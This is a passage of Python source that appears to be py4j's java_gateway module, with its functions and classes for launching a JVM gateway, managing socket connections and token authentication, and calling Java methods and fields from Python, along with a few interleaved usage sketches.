msg = "{0} is deprecated and will be removed in version {1}. "\
"Use {2} instead."\
.format(name, last_version, use_instead)
logger.log(level, msg)
if raise_exc:
raise DeprecationWarning(msg)
def java_import(jvm_view, import_str):
"""Imports the package or class specified by `import_str` in the
jvm view namespace.
:param jvm_view: The jvm_view in which to import a class/package.
:import_str: The class (e.g., java.util.List) or the package
(e.g., java.io.*) to import
"""
gateway_client = jvm_view._gateway_client
command = proto.JVMVIEW_COMMAND_NAME + proto.JVM_IMPORT_SUB_COMMAND_NAME +\
jvm_view._id + "\n" + escape_new_line(import_str) + "\n" +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
return_value = get_return_value(answer, gateway_client, None, None)
return return_value
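# Illustrative usage sketch (not part of py4j itself): after importing a package
# into a jvm view, classes can be referenced by their simple names. Assumes a
# JavaGateway already connected to a running GatewayServer.
def _example_java_import(gateway):
    java_import(gateway.jvm, "java.util.*")
    array_list = gateway.jvm.ArrayList()  # resolvable thanks to the import above
    array_list.add("hello")
    return array_list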
def find_jar_path():
"""Tries to find the path where the py4j jar is located.
"""
paths = []
jar_file = "py4j{0}.jar".format(__version__)
maven_jar_file = "py4j-{0}.jar".format(__version__)
paths.append(jar_file)
# ant
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../py4j-java/" + jar_file))
# maven
paths.append(os.path.join(
os.path.dirname(os.path.realpath(__file__)),
"../../../py4j-java/target/" + maven_jar_file))
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../share/py4j/" + jar_file))
paths.append("../../../current-release/" + jar_file)
paths.append(os.path.join(sys.prefix, "share/py4j/" + jar_file))
    # pip install py4j # On Ubuntu 16.04, where virtualenvpath=/usr/local
# this file is here:
# virtualenvpath/lib/pythonX/dist-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
    # pip install --user py4j # On Ubuntu 16.04, where virtualenvpath=~/.local
# this file is here:
# virtualenvpath/lib/pythonX/site-packages/py4j/java_gateway.py
# the jar file is here: virtualenvpath/share/py4j/py4j.jar
paths.append(os.path.join(os.path.dirname(
os.path.realpath(__file__)), "../../../../share/py4j/" + jar_file))
for path in paths:
if os.path.exists(path):
return path
return ""
def launch_gateway(port=0, jarpath="", classpath="", javaopts=[],
die_on_exit=False, redirect_stdout=None,
redirect_stderr=None, daemonize_redirect=True,
java_path="java", create_new_process_group=False,
enable_auth=False, cwd=None, return_proc=False):
"""Launch a `Gateway` in a new Java process.
The redirect parameters accept file-like objects, Queue, or deque. When
text lines are sent to the stdout or stderr of the child JVM, these lines
are redirected to the file-like object (``write(line)``), the Queue
(``put(line)``), or the deque (``appendleft(line)``).
The text line will contain a newline character.
Only text output is accepted on stdout and stderr. If you wish to
communicate with the child JVM through bytes, you need to create your own
helper function.
:param port: the port to launch the Java Gateway on. If no port is
specified then an ephemeral port is used.
:param jarpath: the path to the Py4J jar. Only necessary if the jar
was installed at a non-standard location or if Python is using
a different `sys.prefix` than the one that Py4J was installed
under.
:param classpath: the classpath used to launch the Java Gateway.
:param javaopts: an array of extra options to pass to Java (the classpath
should be specified using the `classpath` parameter, not `javaopts`.)
:param die_on_exit: if `True`, the Java gateway process will die when
this Python process exits or is killed.
:param redirect_stdout: where to redirect the JVM stdout. If None (default)
stdout is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time
to these objects.
    :param redirect_stderr: where to redirect the JVM stderr. If None (default)
stderr is redirected to os.devnull. Otherwise accepts a
file descriptor, a queue, or a deque. Will send one line at a time to
these objects.
:param daemonize_redirect: if True, the consumer threads will be daemonized
and will not prevent the main Python process from exiting. This means
the file descriptors (stderr, stdout, redirect_stderr, redirect_stdout)
might not be properly closed. This is not usually a problem, but in
case of errors related to file descriptors, set this flag to False.
:param java_path: If None, Py4J will use $JAVA_HOME/bin/java if $JAVA_HOME
is defined, otherwise it will use "java".
:param create_new_process_group: If True, the JVM is started in a new
process group. This ensures that signals sent to the parent Python
process are not forwarded to the JVM. For example, sending
Ctrl-C/SIGINT won't interrupt the JVM. If the python process dies, the
Java process will stay alive, which may be a problem for some scenarios
though.
:param enable_auth: If True, the server will require clients to provide an
authentication token when connecting.
:param cwd: If not None, path that will be used as the current working
directory of the Java process.
:param return_proc: If True, returns the Popen object returned when the JVM
process was created.
:rtype: the port number of the `Gateway` server or, when auth enabled,
a 2-tuple with the port number and the auth token.
"""
popen_kwargs = {}
if not jarpath:
jarpath = find_jar_path()
if not java_path:
java_home = os.environ.get("JAVA_HOME")
if java_home:
java_path = os.path.join(java_home, "bin", "java")
else:
java_path = "java"
# Fail if the jar does not exist.
if not os.path.exists(jarpath):
raise Py4JError("Could not find py4j jar at {0}".format(jarpath))
# Launch the server in a subprocess.
classpath = os.pathsep.join((jarpath, classpath))
command = [java_path, "-classpath", classpath] + javaopts + \
["py4j.GatewayServer"]
if die_on_exit:
command.append("--die-on-broken-pipe")
if enable_auth:
command.append("--enable-auth")
command.append(str(port))
logger.debug("Launching gateway with command {0}".format(command))
# stderr redirection
close_stderr = False
if redirect_stderr is None:
stderr = open(os.devnull, "w")
close_stderr = True
elif isinstance(redirect_stderr, Queue) or\
isinstance(redirect_stderr, deque):
stderr = PIPE
else:
stderr = redirect_stderr
# we don't need this anymore
redirect_stderr = None
# stdout redirection
if redirect_stdout is None:
redirect_stdout = open(os.devnull, "w")
if create_new_process_group:
popen_kwargs.update(get_create_new_process_group_kwargs())
proc = Popen(command, stdout=PIPE, stdin=PIPE, stderr=stderr,
cwd=cwd, **popen_kwargs)
# Determine which port the server started on (needed to support
# ephemeral ports)
_port = int(proc.stdout.readline())
# Read the auth token from the server if enabled.
_auth_token = None
if enable_auth:
_auth_token = proc.stdout.readline()[:-1]
# Start consumer threads so process does not deadlock/hangs
OutputConsumer(
redirect_stdout, proc.stdout, daemon=daemonize_redirect).start()
if redirect_stderr is not None:
OutputConsumer(
redirect_stderr, proc.stderr, daemon=daemonize_redirect).start()
ProcessConsumer(proc, [redirect_stdout], daemon=daemonize_redirect).start()
if close_stderr:
# XXX This will quiet ResourceWarning in Python 3.5+
# This only close the fd in this process, not in the JVM process, which
# makes sense.
quiet_close(stderr)
if enable_auth:
output = (_port, _auth_token)
else:
output = _port
if return_proc:
if isinstance(output, tuple):
output = output + (proc, )
else:
output = (_port, proc)
return output
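# Illustrative usage sketch (not py4j's own code): launching a JVM with
# launch_gateway and connecting a JavaGateway to the ephemeral port it reports.
# The deque captures the JVM's stdout line by line, as described in the
# docstring above.
def _example_launch_and_connect():
    stdout_lines = deque()
    port = launch_gateway(redirect_stdout=stdout_lines, die_on_exit=True)
    gateway = JavaGateway(gateway_parameters=GatewayParameters(port=port))
    return gateway, stdout_lines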
def get_field(java_object, field_name):
"""Retrieves the field named `field_name` from the `java_object`.
This function is useful when `auto_field=false` in a gateway or
Java object.
:param java_object: the instance containing the field
:param field_name: the name of the field to retrieve
"""
command = proto.FIELD_COMMAND_NAME + proto.FIELD_GET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
else:
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def set_field(java_object, field_name, value):
"""Sets the field named `field_name` of `java_object` to `value`.
This function is the only way to set a field because the assignment
operator in Python cannot be overloaded.
:param java_object: the instance containing the field
:param field_name: the name of the field to set
:param value: the value to assign to the field
"""
command_part = get_command_part(
value,
java_object._gateway_client.gateway_property.pool)
command = proto.FIELD_COMMAND_NAME + proto.FIELD_SET_SUBCOMMAND_NAME +\
java_object._target_id + "\n" + field_name + "\n" +\
command_part + proto.END_COMMAND_PART
answer = java_object._gateway_client.send_command(command)
has_error, error_message = get_error_message(answer)
if answer == proto.NO_MEMBER_COMMAND or has_error:
message = compute_exception_message(
"no field {0} in object {1}".format(
field_name, java_object._target_id), error_message)
raise Py4JError(message)
return get_return_value(
answer, java_object._gateway_client, java_object._target_id,
field_name)
def get_method(java_object, method_name):
"""Retrieves a reference to the method of an object.
This function is useful when `auto_field=true` and an instance field has
the same name as a method. The full signature of the method is not
required: it is determined when the method is called.
:param java_object: the instance containing the method
:param method_name: the name of the method to retrieve
"""
return JavaMember(
method_name, java_object, java_object._target_id,
java_object._gateway_client)
def is_instance_of(gateway, java_object, java_class):
"""Indicates whether a java object is an instance of the provided
java_class.
:param gateway: the JavaGateway instance
:param java_object: the JavaObject instance
:param java_class: can be a string (fully qualified name), a JavaClass
instance, or a JavaObject instance)
"""
if isinstance(java_class, basestring):
param = java_class
elif isinstance(java_class, JavaClass):
param = java_class._fqn
elif isinstance(java_class, JavaObject):
param = java_class.getClass()
else:
raise Py4JError(
"java_class must be a string, a JavaClass, or a JavaObject")
return gateway.jvm.py4j.reflection.TypeUtil.isInstanceOf(
param, java_object)
def get_java_class(java_class):
"""Returns the java.lang.Class of a JavaClass. This is equivalent to
calling .class in Java.
:param java_class: An instance of JavaClass
:rtype: An instance of JavaObject that corresponds to a java.lang.Class
"""
return java_class._java_lang_class
def quiet_close(closable):
"""Quietly closes a closable object without throwing an exception.
:param closable: Object with a ``close`` method.
"""
if closable is None:
        # Do not attempt to close a None. This logs unnecessary exceptions.
return
try:
closable.close()
except Exception:
logger.debug("Exception while closing", exc_info=True)
def quiet_shutdown(socket_instance):
"""Quietly shuts down a socket without throwing an exception.
:param socket_instance: Socket with ``shutdown`` method.
"""
if socket_instance is None:
        # Do not attempt to close a None. This logs unnecessary exceptions.
return
try:
socket_instance.shutdown(socket.SHUT_RDWR)
except Exception:
logger.debug("Exception while shutting down a socket", exc_info=True)
def set_linger(a_socket):
"""Sets SO_LINGER to true, 0 to send a RST packet. This forcibly closes the
connection and the remote socket should fail on write and should not need
to read to realize that the socket was closed.
Only use on timeout and maybe shutdown because it does not terminate the
TCP connection normally.
"""
l_onoff = 1
l_linger = 0
a_socket.setsockopt(
socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack(b'ii', l_onoff, l_linger))
def check_connection(a_socket, read_timeout):
"""Checks that a socket is ready to receive by reading from it.
If the read times out, this is a good sign. If the read returns an
empty string, this usually means that the socket was remotely closed.
:param a_socket: The socket to read from.
:param read_timeout: The read_timeout to restore the socket to.
"""
a_socket.settimeout(0.0001)
response = 0
try:
response = a_socket.recv(2)
except socket.timeout:
# Do nothing this is expected!
pass
finally:
a_socket.settimeout(read_timeout)
if response == b"":
raise Exception("The connection was remotely closed.")
def gateway_help(gateway_client, var, pattern=None, short_name=True,
display=True):
"""Displays a help page about a class or an object.
:param gateway_client: The gatway client
:param var: JavaObject, JavaClass or JavaMember for which a help page
will be generated.
:param pattern: Star-pattern used to filter the members. For example
"get*Foo" may return getMyFoo, getFoo, getFooBar, but not bargetFoo.
The pattern is matched against the entire signature. To match only
the name of a method, use "methodName(*".
:param short_name: If True, only the simple name of the parameter
types and return types will be displayed. If False, the fully
qualified name of the types will be displayed.
:param display: If True, the help page is displayed in an interactive
page similar to the `help` command in Python. If False, the page is
returned as a string.
"""
if hasattr2(var, "_get_object_id"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_OBJECT_SUBCOMMAND_NAME +\
var._get_object_id() + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "_fqn"):
command = proto.HELP_COMMAND_NAME +\
proto.HELP_CLASS_SUBCOMMAND_NAME +\
var._fqn + "\n" +\
get_command_part(pattern) +\
get_command_part(short_name) +\
proto.END_COMMAND_PART
answer = gateway_client.send_command(command)
elif hasattr2(var, "container") and hasattr2(var, "name"):
if pattern is not None:
raise Py4JError("pattern should be None with var is a JavaMember")
pattern = var.name + "(*"
var = var.container
return gateway_help(
gateway_client, var, pattern, short_name=short_name,
display=display)
else:
raise Py4JError(
"var is none of Java Object, Java Class or Java Member")
help_page = get_return_value(answer, gateway_client, None, None)
if (display):
pager(help_page)
else:
return help_page
def do_client_auth(command, input_stream, sock, auth_token):
"""Receives and decodes a auth token.
- If the token does not match, an exception is raised.
- If the command received is not an Auth command, an exception is raised.
- If an exception occurs, it is wrapped in a Py4JAuthenticationError.
- Otherwise, it returns True.
"""
try:
if command != proto.AUTH_COMMAND_NAME:
raise Py4JAuthenticationError("Expected {}, received {}.".format(
proto.AUTH_COMMAND_NAME, command))
client_token = smart_decode(input_stream.readline()[:-1])
# Remove the END marker
input_stream.readline()
if auth_token == client_token:
success = proto.OUTPUT_VOID_COMMAND.encode("utf-8")
sock.sendall(success)
else:
error = proto.ERROR_RETURN_MESSAGE.encode("utf-8")
# TODO AUTH Send error message with the error?
sock.sendall(error)
raise Py4JAuthenticationError("Client authentication failed.")
except Py4JAuthenticationError:
raise
except Exception as e:
logger.exception(
"An exception occurred while trying to authenticate "
"a connection")
raise Py4JAuthenticationError(cause=e)
return True
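# Illustrative sketch (not py4j's own code): wiring the auth token end to end.
# With enable_auth=True, launch_gateway returns (port, token), and the same
# token must be passed back through GatewayParameters so every connection
# authenticates before sending commands.
def _example_authenticated_gateway():
    port, token = launch_gateway(enable_auth=True, die_on_exit=True)
    return JavaGateway(
        gateway_parameters=GatewayParameters(port=port, auth_token=token))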
def _garbage_collect_object(gateway_client, target_id):
try:
try:
ThreadSafeFinalizer.remove_finalizer(
smart_decode(gateway_client.address) +
smart_decode(gateway_client.port) +
target_id)
gateway_client.garbage_collect_object(target_id)
except Exception:
logger.debug(
"Exception while garbage collecting an object",
exc_info=True)
except Exception:
# Maybe logger is dead at this point.
pass
def _garbage_collect_connection(socket_instance):
"""Closes the socket if auto_delete is True and the socket is opened.
This is an acceptable practice if you know that your Python VM implements
garbage collection and closing sockets immediately is not a concern.
Otherwise, it is always better (because it is predictable) to explicitly
close the socket by calling `GatewayConnection.close()`.
"""
try:
if socket_instance is not None:
quiet_shutdown(socket_instance)
quiet_close(socket_instance)
except Exception:
# Maybe logger used by quiet_* is dead at this point
pass
def _garbage_collect_proxy(pool, proxy_id):
"""Removes a proxy from the pool of python proxies.
Do not remove special proxies such as the entry point.
Note: even though this function starts with _garbage_collect,
    it is not called within a weakref lambda. This is only a private function.
"""
success = False
if proxy_id != proto.ENTRY_POINT_OBJECT_ID:
try:
del(pool[proxy_id])
success = True
except KeyError:
logger.warning(
"Tried to garbage collect non existing python proxy {0}"
.format(proxy_id))
return success
class OutputConsumer(CompatThread):
"""Thread that consumes output
"""
def __init__(self, redirect, stream, *args, **kwargs):
super(OutputConsumer, self).__init__(*args, **kwargs)
self.redirect = redirect
self.stream = stream
if isinstance(redirect, Queue):
self.redirect_func = self._pipe_queue
if isinstance(redirect, deque):
self.redirect_func = self._pipe_deque
if hasattr2(redirect, "write"):
self.redirect_func = self._pipe_fd
def _pipe_queue(self, line):
self.redirect.put(line)
def _pipe_deque(self, line):
self.redirect.appendleft(line)
def _pipe_fd(self, line):
self.redirect.write(line)
def run(self):
lines_iterator = iter(self.stream.readline, b"")
for line in lines_iterator:
self.redirect_func(smart_decode(line))
class ProcessConsumer(CompatThread):
"""Thread that ensures process stdout and stderr are properly closed.
"""
def __init__(self, proc, closable_list, *args, **kwargs):
super(ProcessConsumer, self).__init__(*args, **kwargs)
self.proc = proc
if closable_list:
# We don't care if it contains queues or deques, quiet_close will
# just ignore them.
self.closable_list = closable_list
else:
self.closable_list = []
def run(self):
self.proc.wait()
quiet_close(self.proc.stdout)
quiet_close(self.proc.stderr)
for closable in self.closable_list:
quiet_close(closable)
class GatewayParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `JavaGateway`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT, auto_field=False,
auto_close=True, auto_convert=False, eager_load=False,
ssl_context=None, enable_memory_management=True,
read_timeout=None, auth_token=None):
"""
:param address: the address to which the client will request a
connection. If you're assing a `SSLContext` with
`check_hostname=True` then this address must match
(one of) the hostname(s) in the certificate the gateway
server presents.
:param port: the port to which the client will request a connection.
Default is 25333.
:param auto_field: if `False`, each object accessed through this
gateway won"t try to lookup fields (they will be accessible only by
calling get_field). If `True`, fields will be automatically looked
up, possibly hiding methods of the same name and making method
calls less efficient.
:param auto_close: if `True`, the connections created by the client
close the socket when they are garbage collected.
:param auto_convert: if `True`, try to automatically convert Python
objects like sequences and maps to Java Objects. Default value is
`False` to improve performance and because it is still possible to
explicitly perform this conversion.
:param eager_load: if `True`, the gateway tries to connect to the JVM
by calling System.currentTimeMillis. If the gateway cannot connect
to the JVM, it shuts down itself and raises an exception.
:param ssl_context: if not None, SSL connections will be made using
this SSLContext
:param enable_memory_management: if True, tells the Java side when a
JavaObject (reference to an object on the Java side) is garbage
collected on the Python side.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a response from the Java side.
        :param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.auto_field = auto_field
self.auto_close = auto_close
self.auto_convert = auto_convert
self.eager_load = eager_load
self.ssl_context = ssl_context
self.enable_memory_management = enable_memory_management
self.read_timeout = read_timeout
self.auth_token = escape_new_line(auth_token)
class CallbackServerParameters(object):
"""Wrapper class that contains all parameters that can be passed to
configure a `CallbackServer`
"""
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PYTHON_PROXY_PORT,
daemonize=False, daemonize_connections=False, eager_load=True,
ssl_context=None,
accept_timeout=DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER,
read_timeout=None, propagate_java_exceptions=False,
auth_token=None):
"""
:param address: the address to which the client will request a
connection
:param port: the port to which the client will request a connection.
            Default is 25334.
:param daemonize: If `True`, will set the daemon property of the server
thread to True. The callback server will exit automatically if all
the other threads exit.
:param daemonize_connections: If `True`, callback server connections
are executed in daemonized threads and will not block the exit of a
program if non daemonized threads are finished.
:param eager_load: If `True`, the callback server is automatically
started when the JavaGateway is created.
:param ssl_context: if not None, the SSLContext's certificate will be
presented to callback connections.
:param accept_timeout: if > 0, sets a timeout in seconds after which
the callbackserver stops waiting for a connection, sees if the
callback server should shut down, and if not, wait again for a
connection. The default is 5 seconds: this roughly means that
            it can take up to 5 seconds to shut down the callback server.
:param read_timeout: if > 0, sets a timeout in seconds after
which the socket stops waiting for a call or command from the
Java side.
:param propagate_java_exceptions: if `True`, any `Py4JJavaError` raised
by a Python callback will cause the nested `java_exception` to be
thrown on the Java side. If `False`, the `Py4JJavaError` will
manifest as a `Py4JException` on the Java side, just as with any
other kind of Python exception. Setting this option is useful if
you need to implement a Java interface where the user of the
interface has special handling for specific Java exception types.
:param auth_token: if provided, an authentication token that clients
must provide to the server when connecting.
"""
self.address = address
self.port = port
self.daemonize = daemonize
self.daemonize_connections = daemonize_connections
self.eager_load = eager_load
self.ssl_context = ssl_context
if accept_timeout == DEFAULT_ACCEPT_TIMEOUT_PLACEHOLDER:
# This is to support deprecated function call...
# TODO Remove "DEFAULT" once we remove the deprecated function
# call.
accept_timeout = DEFAULT_CALLBACK_SERVER_ACCEPT_TIMEOUT
self.accept_timeout = accept_timeout
self.read_timeout = read_timeout
self.propagate_java_exceptions = propagate_java_exceptions
self.auth_token = escape_new_line(auth_token)
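# Illustrative usage sketch (not py4j's own code): enabling the callback server
# so Java can call back into Python. The Java interface name used below is
# hypothetical and would have to exist on the Java side.
def _example_callback_server():
    gateway = JavaGateway(
        callback_server_parameters=CallbackServerParameters(daemonize=True))

    class PythonListener(object):
        def notify(self, event):
            return "python got: {0}".format(event)

        class Java:
            implements = ["com.example.Listener"]  # hypothetical interface

    return gateway, PythonListener()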
class DummyRLock(object):
def __init__(self):
pass
def acquire(self, blocking=1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, type, value, tb):
pass
class GatewayConnectionGuard(object):
def __init__(self, client, connection):
self._client = client
self._connection = connection
def __enter__(self):
return self
def read(self, hint=-1):
return self._connection.stream.read(hint)
def __exit__(self, type, value, traceback):
if value is None:
self._client._give_back_connection(self._connection)
else:
self._connection.close()
class GatewayClient(object):
"""Responsible for managing connections to the JavaGateway.
This implementation is thread-safe and connections are created on-demand.
This means that Py4J-Python can be accessed by multiple threads and
messages are sent to and processed concurrently by the Java Gateway.
When creating a custom :class:`JavaGateway`, it is recommended to pass an
instance of :class:`GatewayClient` instead of a :class:`GatewayConnection`:
both have the same interface, but the client supports multiple threads and
connections, which is essential when using callbacks. """
def __init__(
self, address=DEFAULT_ADDRESS, port=DEFAULT_PORT,
auto_close=True, gateway_property=None,
ssl_context=None, gateway_parameters=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: used to keep gateway preferences without a
cycle with the gateway
"""
if address != DEFAULT_ADDRESS:
deprecated("GatewayClient.address", "1.0", "GatewayParameters")
if port != DEFAULT_PORT:
deprecated("GatewayClient.port", "1.0", "GatewayParameters")
if not gateway_parameters:
gateway_parameters = GatewayParameters(
address=address, port=port, auto_close=auto_close,
ssl_context=ssl_context)
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
self.is_connected = True
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.ssl_context = gateway_parameters.ssl_context
self.deque = deque()
def garbage_collect_object(self, target_id):
"""Tells the Java side that there is no longer a reference to this
JavaObject on the Python side.
"""
if target_id != proto.ENTRY_POINT_OBJECT_ID and\
target_id != proto.GATEWAY_SERVER_OBJECT_ID and\
self.is_connected:
try:
self.send_command(
proto.MEMORY_COMMAND_NAME +
proto.MEMORY_DEL_SUBCOMMAND_NAME +
target_id +
"\ne\n")
except Exception:
logger.debug("Exception while garbage collecting an object",
exc_info=True)
def _get_connection(self):
if not self.is_connected:
raise Py4JNetworkError("Gateway is not connected.")
try:
connection = self.deque.pop()
except IndexError:
connection = self._create_connection()
return connection
def _create_connection(self):
connection = GatewayConnection(
self.gateway_parameters, self.gateway_property)
connection.start()
return connection
def _give_back_connection(self, connection):
try:
self.deque.append(connection)
except Exception:
logger.warning(
"Exception while giving back connection", exc_info=True)
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the
gateway server: all active connections will be closed. This may
be useful if the lifecycle of the Java program must be tied to
the Python program.
"""
connection = self._get_connection()
try:
connection.shutdown_gateway()
self.close()
self.is_connected = False
except Py4JNetworkError:
logger.debug("Error while shutting down gateway.", exc_info=True)
self.shutdown_gateway()
def send_command(self, command, retry=True, binary=False):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users. It is usually called by
:class:`JavaMember` instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:param retry: if `True`, the GatewayClient tries to resend a message
if it fails.
:param binary: if `True`, we won't wait for a Py4J-protocol response
from the other end; we'll just return the raw connection to the
caller. The caller becomes the owner of the connection, and is
responsible for closing the connection (or returning it this
`GatewayClient` pool using `_give_back_connection`).
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol). The guarded `GatewayConnection` is also returned
if `binary` is `True`.
"""
connection = self._get_connection()
try:
response = connection.send_command(command)
if binary:
return response, self._create_connection_guard(connection)
elif is_fatal_error(response):
connection.close(False)
else:
self._give_back_connection(connection)
except Py4JNetworkError as pne:
if connection:
reset = False
if isinstance(pne.cause, socket.timeout):
reset = True
connection.close(reset)
if self._should_retry(retry, connection, pne):
                logger.info("Exception while sending command.", exc_info=True)
response = self.send_command(command, binary=binary)
else:
                logger.exception(
                    "Exception while sending command.")
response = proto.ERROR
return response
def _create_connection_guard(self, connection):
return GatewayConnectionGuard(self, connection)
def _should_retry(self, retry, connection, pne=None):
return pne and pne.when == proto.ERROR_ON_SEND
def close(self):
"""Closes all currently opened connections.
This operation is not thread safe and is only a best effort strategy
to close active connections.
All connections are guaranteed to be closed only if no other thread
is accessing the client and no call is pending.
"""
size = len(self.deque)
for _ in range(0, size):
try:
connection = self.deque.pop()
quiet_close(connection)
except IndexError:
pass
class GatewayConnection(object):
"""Default gateway connection (socket based) responsible for communicating
with the Java Virtual Machine."""
def __init__(self, gateway_parameters, gateway_property=None):
"""
:param gateway_parameters: the set of parameters used to configure the
GatewayClient.
:param gateway_property: contains gateway preferences to avoid a cycle
with gateway
"""
self.gateway_parameters = gateway_parameters
self.address = gateway_parameters.address
self.port = gateway_parameters.port
af_type = socket.getaddrinfo(self.address, self.port)[0][0]
self.socket = socket.socket(af_type, socket.SOCK_STREAM)
if gateway_parameters.read_timeout:
self.socket.settimeout(gateway_parameters.read_timeout)
if gateway_parameters.ssl_context:
self.socket = gateway_parameters.ssl_context.wrap_socket(
self.socket, server_hostname=self.address)
self.is_connected = False
self.auto_close = gateway_parameters.auto_close
self.gateway_property = gateway_property
self.wr = weakref.ref(
self,
lambda wr, socket_instance=self.socket:
_garbage_collect_connection and
_garbage_collect_connection(socket_instance))
def start(self):
"""Starts the connection by connecting to the `address` and the `port`
"""
try:
self.socket.connect((self.address, self.port))
self.stream = self.socket.makefile("rb")
self.is_connected = True
self._authenticate_connection()
except Py4JAuthenticationError:
logger.exception("Cannot authenticate with gateway server.")
raise
except Exception as e:
msg = "An error occurred while trying to connect to the Java "\
"server ({0}:{1})".format(self.address, self.port)
logger.exception(msg)
raise Py4JNetworkError(msg, e)
def _authenticate_connection(self):
if self.gateway_parameters.auth_token:
cmd = "{0}\n{1}\n".format(
proto.AUTH_COMMAND_NAME,
self.gateway_parameters.auth_token
)
answer = self.send_command(cmd)
error, _ = proto.is_error(answer)
if error:
# At this point we do not expect the caller to clean
# the connection so we clean ourselves.
self.close(reset=True)
raise Py4JAuthenticationError(
"Failed to authenticate with gateway server.")
def close(self, reset=False):
"""Closes the connection by closing the socket.
If reset is True, sends a RST packet with SO_LINGER
"""
if reset:
set_linger(self.socket)
else:
            # Send a shutdown before attempting to close the stream or socket.
quiet_shutdown(self.socket)
quiet_close(self.stream)
quiet_close(self.socket)
self.is_connected = False
def shutdown_gateway(self):
"""Sends a shutdown command to the gateway. This will close the gateway
server: all active connections will be closed. This may be useful
if the lifecycle of the Java program must be tied to the Python
program.
"""
if not self.is_connected:
raise Py4JError("Gateway must be connected to send shutdown cmd.")
try:
quiet_close(self.stream)
self.socket.sendall(
proto.SHUTDOWN_GATEWAY_COMMAND_NAME.encode("utf-8"))
quiet_close(self.socket)
self.is_connected = False
except Exception:
# Do nothing! Exceptions might occur anyway.
logger.debug("Exception occurred while shutting down gateway",
exc_info=True)
def send_command(self, command):
"""Sends a command to the JVM. This method is not intended to be
called directly by Py4J users: it is usually called by JavaMember
instances.
:param command: the `string` command to send to the JVM. The command
must follow the Py4J protocol.
:rtype: the `string` answer received from the JVM (The answer follows
the Py4J protocol).
"""
logger.debug("Command to send: {0}".format(command))
try:
# Write will only fail if remote is closed for large payloads or
# if it sent a RST packet (SO_LINGER)
self.socket.sendall(command.encode("utf-8"))
except Exception as e:
logger.info("Error while sending.", exc_info=True)
raise Py4JNetworkError(
"Error while sending", e, proto.ERROR_ON_SEND)
try:
answer = smart_decode(self.stream.readline()[:-1])
logger.debug("Answer received: {0}".format(answer))
if answer.startswith(proto.RETURN_MESSAGE):
answer = answer[1:]
            # Happens when the other end is dead. There might be an empty
# answer before the socket raises an error.
if answer.strip() == "":
raise Py4JNetworkError("Answer from Java side is empty")
return answer
except Exception as e:
logger.info("Error while receiving.", exc_info=True)
raise Py4JNetworkError(
"Error while receiving", e, proto.ERROR_ON_RECEIVE)
class JavaMember(object):
"""Represents a member (i.e., method) of a :class:`JavaObject`. For now,
only methods are supported. Fields are retrieved directly and are not
contained in a JavaMember.
"""
def __init__(self, name, container, target_id, gateway_client):
self.name = name
self.container = container
self.target_id = target_id
self.gateway_client = gateway_client
self.command_header = self.target_id + "\n" + self.name + "\n"
self.pool = self.gateway_client.gateway_property.pool
self.converters = self.gateway_client.converters
self._gateway_doc = None
@property
def __doc__(self):
# The __doc__ string is used by IPython/PyDev/etc to generate
# help string, therefore provide useful help
if self._gateway_doc is None:
self._gateway_doc = gateway_help(
self.gateway_client, self, display=False)
return self._gateway_doc
def _get_args(self, args):
temp_args = []
new_args = []
for arg in args:
if not isinstance(arg, JavaObject):
for converter in self.gateway_client.converters:
if converter.can_convert(arg):
temp_arg = converter.convert(arg, self.gateway_client)
temp_args.append(temp_arg)
new_args.append(temp_arg)
break
else:
new_args.append(arg)
else:
new_args.append(arg)
return (new_args, temp_args)
def _build_args(self, *args):
if self.converters is not None and len(self.converters) > 0:
(new_args, temp_args) = self._get_args(args)
else:
new_args = args
temp_args = []
args_command = "".join(
[get_command_part(arg, self.pool) for arg in new_args])
return args_command, temp_args
def stream(self, *args):
"""
Call the method using the 'binary' protocol.
:rtype: The `GatewayConnection` that the call command was sent to.
"""
args_command, temp_args = self._build_args(*args)
command = proto.STREAM_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer, connection = self.gateway_client.send_command(
command, binary=True)
# parse the return value to throw an exception if necessary
get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return connection
def __call__(self, *args):
args_command, temp_args = self._build_args(*args)
command = proto.CALL_COMMAND_NAME +\
self.command_header +\
args_command +\
proto.END_COMMAND_PART
answer = self.gateway_client.send_command(command)
return_value = get_return_value(
answer, self.gateway_client, self.target_id, self.name)
for temp_arg in temp_args:
temp_arg._detach()
return return_value
class JavaObject(object):
"""Represents a Java object from which you can call methods or access
fields."""
def __init__(self, target_id, gateway_client):
"""
:param target_id: the identifier of the object on the JVM side. Given
by the JVM.
:param gateway_client: the gateway client used to communicate with
the JVM.
"""
self._target_id = target_id
self._gateway_client = gateway_client
